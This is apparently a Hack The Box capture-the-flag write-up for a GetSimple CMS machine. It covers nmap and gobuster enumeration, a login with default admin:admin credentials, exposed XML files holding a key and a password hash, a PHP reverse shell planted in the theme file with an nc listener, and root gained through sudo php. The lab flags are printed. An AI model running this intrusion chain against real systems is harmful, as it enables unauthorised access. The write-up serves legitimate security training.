Easy HTB machine where I exploit a webserver with GetSimple CMS.
Introduction
I will use gobuster to find a hidden login page and use default credentials to get initial access. I get a www-data shell by using a reverse shell, and elevate privilages to root by using the sudo access for /usr/bin/php.
Enumeration
nmap output:
DuxSec@hi$ nmap -sV -T4 -sC 10.129.217.0 -v
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 06:19 EDT
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
| http-robots.txt: 1 disallowed entry
|_/admin/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.01s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds
|
Port 22 and 80 are open. Let’s have a look at the website, and while I am browsing I start a gobuster scan.
Host configuration
I tried to go to http://10.129.217.0 but this took ages to load, so I added the IP to my /etc/hosts/
file. I added the following line:
10.129.217.0 gettingstarted.htb
Because of this change I could now visit http://gettingstarted.htb
without delay. I read in the HTB forums later on that multiple people had this issue.
Gobuster results
Well that took some time and the gobuster is already finished, so let’s look at that.
DuxSec@hi$ gobuster dir -u http://10.129.217.0 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.217.0
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/29 06:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.129.217.0/admin/]
/backups (Status: 301) [Size: 314] [--> http://10.129.217.0/backups/]
/.htaccess (Status: 403) [Size: 277]
/data (Status: 301) [Size: 311] [--> http://10.129.217.0/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 314] [--> http://10.129.217.0/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 277]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 312] [--> http://10.129.217.0/theme/]
Progress: 4444 / 4615 (96.29%)
===============================================================
2023/06/29 06:20:35 Finished
===============================================================
|
Many hits! /admin looks very interesting, it gives shows us the following login page:
I try the credentials admin:admin
and I am in the admin panel!
I still checked the other gobuster links to see if there is anything interesting, and found the following that there are open directories, this might be helpful later on. Some examples:
http://gettingstarted.htb/data/other/authorization.xml
1
2
3
|
<item>
<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>
|
http://gettingstarted.htb/data/users/admin.xml
1
2
3
4
5
6
7
8
9
|
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
|
The next step is to get a reverse shell, I chose to use https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
due to its simplicity. I replace the original theme code with the reverse shell.
Now I can open a nc
listener. Then I can go to http://gettingstarted.htb
, normally it would load the theme file, but since that is my reverse shell now, it executes that instead. It connects back to me and I succesfully get a shell as www-data
.
DuxSec@hi$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.155] from (UNKNOWN) [10.129.162.83] 52066
Linux gettingstarted 5.4.0-65-generic #73-Ubuntu SMP Mon Jan 18 17:25:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
14:28:43 up 30 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
|
To get a fully interactive shell I use Python3;
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@gettingstarted:/$ ^Z
zsh: suspended nc -lvnp 4444
DuxSec@hi$ stty raw -echo; fg
[1] + continued nc -lvnp 4444
www-data@gettingstarted:/$
|
User flag
The first flag can be read since www-data has read access to mrb3n
’s home directory.
www-data@gettingstarted:/home/mrb3n$ cat user.txt
7002d65b149b0a4d19132a66feed21d8
|
Root flag
To get the root flag I look for sudo rights, and it shows that www-data can use /usr/bin/php
as root without using a password.
www-data@gettingstarted:/$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
|
Knowing that php can be ran as sudo, I can spawn a shell as sudo via php in the
following way:
www-data@gettingstarted:/$ sudo /usr/bin/php -r 'system("/bin/bash");'
root@gettingstarted:/# whoami
root
root@gettingstarted:/# cd /root
root@gettingstarted:~# cat root.txt
root@gettingstarted:~# f1fba6e9f71efb2630e6e34da6387842
|
If I wouldn’t know php, I could use https://gtfobins.github.io/gtfobins/php/
to find a privilege escalation oneliner.